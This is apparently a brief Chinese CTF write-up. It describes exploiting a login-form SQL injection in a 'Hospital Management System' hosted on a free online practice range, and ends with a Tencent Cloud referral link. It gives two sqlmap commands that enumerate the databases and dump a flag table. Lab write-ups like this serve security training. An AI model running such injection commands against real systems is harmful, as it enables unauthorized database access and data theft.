是一个医院管理系统----Hospital Management System
,存在sqli漏洞。
本人使用春秋云境免费靶场在线搭建。
github找到了该漏洞的介绍。注入点在登录框。
sqlmap -r sqli.txt --random-agent --risk=3 --level=3 -dbs
Bash
sqlmap -r sqli.txt --random-agent --risk=3 --level=3 -D ctf -T flag --dump
Bash
Github点击here
我加入了腾讯云自媒体分享计划
,可以获取到腾讯云周边、技术书籍、线下沙龙、云服务器优惠等等。
我的博客即将同步至腾讯云开发者社区,邀请大家一同入驻:https://cloud.tencent.com/developer/support-plan?invite_code=1f93zvim5fqci